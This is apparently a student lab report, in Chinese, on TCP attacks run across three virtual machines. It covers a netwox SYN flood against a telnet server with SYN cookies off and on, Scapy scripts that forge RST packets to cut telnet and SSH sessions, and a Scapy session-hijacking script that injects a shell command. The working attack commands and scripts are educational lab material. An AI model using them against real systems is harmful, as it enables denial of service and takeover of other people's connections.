

lab4实验报告

57117134-张家康

Task 1: SYN Flooding Attack

1.1 实验环境

本实验需要3台虚拟机，3台虚拟机分别命名为A,B,C，通过热点连接。

虚拟机A:

```
enp0s3 Link encap:Ethernet HWaddr 08:00:27:87:b9:9d
        inet addr:192.168.43.236 Bcast:192.168.43.255 Mask:255.255.255.0
        inet6 addr: fe80::db1f:c06d:52d3:8c0c/64 Scope:Link
        UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
        RX packets:174 errors:0 dropped:0 overruns:0 frame:0
        TX packets:195 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:1000
        RX bytes:25611 (25.6 KB) TX bytes:22262 (22.2 KB)
```

虚拟机B:

```
user@user-VirtualBox:~$ ifconfig
enp0s3 Link encap:以太网 硬件地址 08:00:27:0b:b2:0b
        inet 地址:192.168.43.177 广播:192.168.43.255 掩码:255.255.255.0
        inet6 地址: fe80::f250:7d4e:f01:4256/64 Scope:Link
        UP BROADCAST RUNNING MULTICAST MTU:1500 跃点数:1
        接收数据包:167 错误:0 丢弃:0 过载:0 帧数:0
        发送数据包:108 错误:0 丢弃:0 过载:0 载波:0
        碰撞:0 发送队列长度:1000
        接收字节:23584 (23.5 KB) 发送字节:15231 (15.2 KB)
```

虚拟机C:

```
user@user-VirtualBox:~$ ifconfig
enp0s3 Link encap:以太网 硬件地址 08:00:27:42:06:65
        inet 地址:192.168.43.79 广播:192.168.43.255 掩码:255.255.255.0
        inet6 地址: fe80::9d97:e1b6:1558:ce68/64 Scope:Link
        UP BROADCAST RUNNING MULTICAST MTU:1500 跃点数:1
        接收数据包:5490 错误:0 丢弃:0 过载:0 帧数:0
        发送数据包:1480 错误:0 丢弃:0 过载:0 载波:0
        碰撞:0 发送队列长度:1000
        接收字节:6644714 (6.6 MB) 发送字节:107027 (107.0 KB)
```

1.2 实验步骤

本次攻击的设计为，虚拟机A对虚拟机B的23端口发起SYN洪泛攻击，虚拟机C对虚拟机B发起Telnet连接进行测试。

首先，在虚拟机B中启动telnet服务器：[参考网页](#)。

安装完成后，输入netstat -a | grep telnet查看telnet服务，如下图所示：

```
user@user-VirtualBox:~$ netstat -a | grep telnet
tcp        0      0 *:telnet          *:*               LISTEN
```

并输入sysctl -w net.ipv4.tcp_syncookies=0关闭虚拟机B的SYN Cookie的防御，如下图所示：

```
user@user-VirtualBox:~$ sudo sysctl -w net.ipv4.tcp_syncookies=0
net.ipv4.tcp_syncookies = 0
```

然后,虚拟机C对虚拟机B发起telnet连接:

```
user@user-VirtualBox:~$ telnet 192.168.43.177
Trying 192.168.43.177...
Connected to 192.168.43.177.
Escape character is '^]'.
Ubuntu 16.04.6 LTS
user-VirtualBox login: 
```

随后,在虚拟机A中启动nnetwox,对虚拟机B发起SYN泛洪攻击:

```
1 netwox 76 -i 192.168.43.177 -p 23 -s raw
```

在虚拟机B中使用netstat -na查看,发现多出了许多状态为SYN_RECV的连接,如下图所示:

```
user@user-VirtualBox:~$ netstat -na
激活Internet连接 (服务器和已建立连接的)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp        0      0 192.168.43.177:23       211.39.73.184:56061     SYN_RECV
tcp        0      0 192.168.43.177:23       36.59.159.64:19820     SYN_RECV
tcp        0      0 192.168.43.177:23       3.152.187.219:43675    SYN_RECV
tcp        0      0 192.168.43.177:23       152.250.55.184:64412   SYN_RECV
tcp        0      0 192.168.43.177:23       27.23.245.241:7538     SYN_RECV
tcp        0      0 192.168.43.177:23       129.100.187.93:51277   SYN_RECV
tcp        0      0 192.168.43.177:23       241.76.38.66:7861      SYN_RECV
tcp        0      0 192.168.43.177:23       27.210.157.42:28147    SYN_RECV
tcp        0      0 192.168.43.177:23       197.210.141.136:17028  SYN_RECV
tcp        0      0 192.168.43.177:23       249.48.116.242:64395   SYN_RECV
tcp        0      0 192.168.43.177:23       119.240.137.17:54190   SYN_RECV
tcp        0      0 192.168.43.177:23       128.234.90.12:57516    SYN_RECV
tcp        0      0 192.168.43.177:23       123.46.199.131:12239   SYN_RECV
tcp        0      0 192.168.43.177:23       6.254.209.242:18636    SYN_RECV
tcp        0      0 192.168.43.177:23       81.159.116.56:12254    SYN_RECV
```

最后,再次使用虚拟机C对虚拟机B发起telnet请求,发现请求很久没有响应,如下图所示:

```
user@user-VirtualBox:~$ telnet 192.168.43.177
Trying 192.168.43.177...

```

现在,我们在虚拟机B中使用sysctl -w net.ipv4.tcp_syncookies=1开启SYN Cookie的防御。再用虚拟机A对虚拟机B发起SYN泛洪攻击。在虚拟机B中输入netstat -na查看连接状态,发现仍然有很多SYN_RECV的连接,如下图所示:

```
user@user-VirtualBox:~$ netstat -na
激活Internet连接 (服务器和已建立连接的)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp        0      0 192.168.43.177:23       240.217.123.190:9027   SYN_RECV
tcp        0      0 192.168.43.177:23       148.229.242.121:61870  SYN_RECV
tcp        0      0 192.168.43.177:23       64.114.139.176:4144    SYN_RECV
tcp        0      0 192.168.43.177:23       152.119.48.204:18981   SYN_RECV
tcp        0      0 192.168.43.177:23       174.235.194.54:54559   SYN_RECV
tcp        0      0 192.168.43.177:23       197.166.162.56:4110    SYN_RECV
tcp        0      0 192.168.43.177:23       44.124.79.30:48302     SYN_RECV
tcp        0      0 192.168.43.177:23       100.33.31.204:23658     SYN_RECV
tcp        0      0 192.168.43.177:23       122.185.155.86:5476    SYN_RECV
tcp        0      0 192.168.43.177:23       180.145.223.86:37390   SYN_RECV
tcp        0      0 192.168.43.177:23       74.85.240.63:13573     SYN_RECV
tcp        0      0 192.168.43.177:23       19.132.69.12:12692     SYN_RECV
tcp        0      0 192.168.43.177:23       95.41.174.184:12897    SYN_RECV
tcp        0      0 192.168.43.177:23       107.244.182.62:21067   SYN_RECV
tcp        0      0 192.168.43.177:23       58.241.243.152:56297   SYN_RECV
```

最后，再次使用虚拟机C对虚拟机B发起telnet请求，可以很快获得请求响应，如下图所示：

```
user@user-VirtualBox:~$ telnet 192.168.43.177
Trying 192.168.43.177...
Connected to 192.168.43.177.
Escape character is '^]'.
Ubuntu 16.04.6 LTS
user-VirtualBox login: 
```

Task 2: TCP RST Attacks on telnet and ssh Connections

2.1 实验环境

与第一个实验的环境相同，分别由3台虚拟机A,B,C，其IP分别为：

1	192.168.43.236	//虚拟机A的IP
2	192.168.43.177	//虚拟机B的IP
3	192.168.43.79	//虚拟机C的IP

2.2 实验设计

本实验中，虚拟机B与虚拟机C建立telnet和ssh连接，虚拟机A通过tcpdump查看其中的seq和ack的值，然后构造RST报文终止连接。

2.3 实验步骤

2.3.1 Telnet连接

首先，将虚拟机B与虚拟机C建立telnet连接，如下图所示：

```
user@user-VirtualBox:~$ telnet 192.168.43.177
Trying 192.168.43.177...
Connected to 192.168.43.177.
Escape character is '^]'.
Ubuntu 16.04.6 LTS
user-VirtualBox login: user
Password:
Last login: Fri Sep 11 17:39:06 CST 2020 from 192.168.43.177 on pts/19
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-112-generic x86_64)
```

然后，在虚拟机A中通过tcpdump查看其中seq和ack的值，如下图所示：

```
06:08:20.062226 IP 192.168.43.177.telnet > 192.168.43.79.52464: Flags [P.], seq 711:713, ack 29, win 509
, options [nop,nop,TS val 3544367785 ecr 3432168066], length 2
06:08:20.062412 IP 192.168.43.79.52464 > 192.168.43.177.telnet: Flags [.], ack 713, win 262, options [no
p,nop,TS val 3432168067 ecr 3544367785], length 0
06:08:20.062610 IP 192.168.43.177.telnet > 192.168.43.79.52464: Flags [P.], seq 713:740, ack 29, win 509
, options [nop,nop,TS val 3544367785 ecr 3432168067], length 27
06:08:20.063241 IP 192.168.43.79.52464 > 192.168.43.177.telnet: Flags [.], ack 740, win 262, options [no
p,nop,TS val 3432168067 ecr 3544367785], length 0
06:08:20.063390 IP 192.168.43.177.telnet > 192.168.43.79.52464: Flags [P.], seq 740:848, ack 29, win 509
, options [nop,nop,TS val 3544367786 ecr 3432168067], length 108
06:08:20.063739 IP 192.168.43.79.52464 > 192.168.43.177.telnet: Flags [.], ack 848, win 262, options [no
p,nop,TS val 3432168068 ecr 3544367786], length 0
06:08:20.063873 IP 192.168.43.177.telnet > 192.168.43.79.52464: Flags [P.], seq 848:850, ack 29, win 509
, options [nop,nop,TS val 3544367786 ecr 3432168068], length 2
06:08:20.064223 IP 192.168.43.79.52464 > 192.168.43.177.telnet: Flags [.], ack 850, win 262, options [no
p,nop,TS val 3432168068 ecr 3544367786], length 0
06:08:20.321660 IP 192.168.43.177.telnet > 192.168.43.79.52464: Flags [P.], seq 850:928, ack 29, win 509
, options [nop,nop,TS val 3544368044 ecr 3432168068], length 78
06:08:20.321931 IP 192.168.43.79.52464 > 192.168.43.177.telnet: Flags [.], ack 928, win 262, options [no
p,nop,TS val 3432168326 ecr 3544368044], length 0
```

由上图可知，虚拟机B与虚拟机C建立telnet连接时，使用的IP和端口分别为：

```
1 192.168.43.177:23 //虚拟机B的IP和端口
2 192.168.43.79: 52464 //虚拟机C的IP和端口
```

且二者在最后一次通讯后，虚拟机B的下一个seq值为928，下一个ack值为29。

因此，在虚拟机A中编写脚本tcp_attck_t.py，输入以下代码：

```
1 from scapy.all import *
2
3 ip = IP(src="192.168.43.177", dst="192.168.43.79")
4 tcp = TCP(sport=23, dport=52464, flags="RA", seq=928, ack=29)
5 pkt = ip/tcp
6 ls(pkt)
7 send(pkt, verbose=0)
```

运行该脚本后，发现虚拟机B与虚拟机C的telnet连接中断。

2.3.2 SSH连接

首先，使用dpkg -l | grep ssh查看是否安装了SSH服务端。如果没有安装，使用sudo apt install openssh-server安装SSH服务端。然后使用sudo /etc/init.d/ssh start启动SSH服务端，如下图所示：

```
user@user-VirtualBox:~$ sudo /etc/init.d/ssh start
[ ok ] Starting ssh (via systemctl): ssh.service.
```

然后，在虚拟机C上与虚拟机B建立ssh连接，如下图所示：

```
user@user-VirtualBox:~$ ssh user@192.168.43.177
user@192.168.43.177's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:    https://landscape.canonical.com
 * Support:       https://ubuntu.com/advantage

81 个可升级软件包。
0 个安全更新。

New release '18.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Sep 11 18:39:10 2020 from 192.168.43.177
```

再使用虚拟机A tcpdump -nn port 22，查看seq和ack的值，如下图所示：

```
07:17:56.984519 IP 192.168.43.177.22 > 192.168.43.79.40972: Flags [P.], seq 2491:2599, ack 219
4, win 501, options [nop,nop,TS val 3548544706 ecr 3436344986], length 108
07:17:56.988451 IP 192.168.43.177.22 > 192.168.43.79.40972: Flags [P.], seq 2599:3051, ack 219
4, win 501, options [nop,nop,TS val 3548544710 ecr 3436344986], length 452
07:17:56.989374 IP 192.168.43.79.40972 > 192.168.43.177.22: Flags [.], ack 3051, win 290, opti
ons [nop,nop,TS val 3436344993 ecr 3548544706], length 0
07:17:57.158608 IP 192.168.43.177.22 > 192.168.43.79.40972: Flags [P.], seq 3051:3167, ack 219
4, win 501, options [nop,nop,TS val 3548544881 ecr 3436344993], length 116
07:17:57.200978 IP 192.168.43.79.40972 > 192.168.43.177.22: Flags [.], ack 3167, win 290, opti
ons [nop,nop,TS val 3436345205 ecr 3548544881], length 0
```

由上图可见，虚拟机B与虚拟机C建立ssh连接时，使用的IP和端口分别为：

```
1 192.168.43.177:22 //虚拟机B的IP和端口
2 192.168.43.79: 40972 //虚拟机C的IP和端口
```

且二者在最后一次通讯后，虚拟机B的下一个seq值为3167，下一个ack值为219。

因此，在虚拟机A中编写脚本tcp_attck_s.py，输入以下代码：

```
1 from scapy.all import *
2
3 ip = IP(src="192.168.43.177", dst="192.168.43.79")
4 tcp = TCP(sport=22, dport=40972, flags="RA", seq=3167, ack=219)
5 pkt = ip/tcp
6 ls(pkt)
7 send(pkt, verbose=0)
```

运行该脚本后，发现虚拟机B与虚拟机C的ssh连接中断。

Task 4: TCP Session Hijacking

4.1 实验环境

与第一个实验的环境相同，分别由3台虚拟机A,B,C，其IP分别为：

```
1 192.168.43.236 //虚拟机A的IP
2 192.168.43.177 //虚拟机B的IP
3 192.168.43.79  //虚拟机C的IP
```

4.2 实验设计

本实验中，虚拟机B与虚拟机C建立telnet连接，虚拟机A通过tcpdump查看其中的seq和ack的值，然后构造劫持报文，让虚拟机B创建一个zjk文件。

4.3 实验步骤

首先，将虚拟机B与虚拟机C建立telnet连接，如下图所示：

```
user@user-VirtualBox:~$ telnet 192.168.43.177
Trying 192.168.43.177...
Connected to 192.168.43.177.
Escape character is '^]'.
Ubuntu 16.04.6 LTS
user-VirtualBox login: user
Password:
Last login: Fri Sep 11 19:17:56 CST 2020 from 192.168.43.79 on pts/18
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:    https://landscape.canonical.com
 * Support:       https://ubuntu.com/advantage

81 个可升级软件包。
0 个安全更新。

New release '18.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
```

然后，在虚拟机A中，使用 `tcpdump -nn port 23` 查看，如下图所示：

```
07:26:41.178733 IP 192.168.43.177.23 > 192.168.43.79.52482: Flags [P.], seq 499:545, ack 147, win 509, options [nop,nop,TS val 3549068901 ecr 3436869183], length 46
07:26:41.178907 IP 192.168.43.79.52482 > 192.168.43.177.23: Flags [.], ack 545, win 237, options [nop,nop,TS val 3436869183 ecr 3549068901], length 0
07:26:41.466500 IP 192.168.43.177.23 > 192.168.43.79.52482: Flags [P.], seq 545:623, ack 147, win 509, options [nop,nop,TS val 3549069189 ecr 3436869183], length 78
07:26:41.466756 IP 192.168.43.79.52482 > 192.168.43.177.23: Flags [.], ack 623, win 237, options [nop,nop,TS val 3436869471 ecr 3549069189], length 0
```

由上图可知，虚拟机B与虚拟机C建立 `telnet` 连接时，使用的IP和端口分别为：

```
1 192.168.43.177:23 //虚拟机B的IP和端口
2 192.168.43.79: 52482 //虚拟机C的IP和端口
```

且二者在最后一次通讯后，虚拟机C的下一个 `seq` 值为 `147`，下一个 `ack` 值为 `623`。

因此，在虚拟机A中编写脚本 `hijacking.py`，输入以下代码：

```
1 from scapy.all import *
2
3 ip = IP(src="192.168.43.79", dst="192.168.43.177")
4 tcp = TCP(sport=52482, dport=23, flags="PA", seq=147, ack=623)
5 payload = "touch zjk"
6 pkt = ip/tcp/payload
7 ls(pkt)
8 send(pkt, verbose=0)
```

运行该脚本后，成功发现虚拟机B的目录下有 `zjk` 文件，如下图所示：

```
user@user-VirtualBox:~$ ls
buffer-overflow  gdb-try1.c          Snort  公共的  文档
buffer-overflow.c http_client_httplib.py user    模板  下载
examples.desktop http_client_socket.py user.pub 视频  音乐
gdb-try1         SEU_Lex-master      zjk     图片  桌面
```